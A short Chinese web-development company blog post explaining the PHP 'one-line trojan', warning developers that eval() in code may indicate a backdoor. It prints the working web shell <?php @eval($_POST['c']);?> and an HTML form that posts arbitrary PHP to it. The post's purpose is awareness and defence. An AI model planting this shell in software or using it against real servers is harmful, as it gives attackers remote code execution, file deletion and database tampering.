福州網站建設>網站新聞>php技術 	
        
 
        

        
        
        
            
        
                
        php一句話木馬eval函數
        
                
                
        發布日期:2017-03-19瀏覽次數:1076  來源:福州網站建設  
        
                
            
        
        
        
        
        
            
         
        
	eval可以用來執行任何其他php代碼,所以對于代碼里發現了eval函數一定要小心,可能是木馬
        

        
	就這一句話害死人,這樣任何人都可以post任何文件上來,所以要做好防范
        

        
	
        
		
        
			 
        
		
        
			
				
        
					
						
        
							1
        
					        		
					
						
        
							
        
								<?php @eval($_POST['c']);?>
        
						
        
					        		
				
        
			        
		
        
	
        

        

        
	使用方法也很簡單,本地提交文件指向提交文件,里面的php代碼就會被執行
        

        
	
        
		
        
			 
        
		
        
			
				
        
					
						
        
							1
        
						
        
							2
        
						
        
							3
        
						
        
							4
        
						
        
							5
        
						
        
							6
        
						
        
							7
        
						
        
							8
        
					        		
					
						
        
							
        
								<html> 
        
							
        
								<body> 
        
							
        
								<form action="a.php" method="post"> 
        
							
        
								<input type="text" name="c" value="phpinfo();"> 
        
							
        
								<input type="submit" value="submit"> 
        
							
        
								</form> 
        
							
        
								</body> 
        
							
        
								</html>
        
						
        
					        		
				
        
			        
		
        
	
        

        

        
如果上面的phpinfo()改成其他 代碼,刪除某個文件夾或對數據庫文件 進行刪除或更改的操作的代碼,那么后果就可想而知。市面上有很多配合一句話木馬 的工具呢。所以,安全第一。 

                       
         以上是由福州網站建設的小編為你分享了"php一句話木馬eval函數"文章,如果你在這方面有什么問題,隨時聯系我們
        
                                
        
        



        
        

        
        
            
        
            	上一篇:thinkphp creat方法自動驗證教程
                                
                下一篇:怎么徹底去掉ECSHOP版權與標志

                            返回欄目列表
                            
        
        
        

         
        
             
             
        php技術有關的文章
        
             
            
        
        
        

           
        
 

        
    
    
        
        如果您有什么問題,歡迎咨詢我們客服!
        點擊QQ咨詢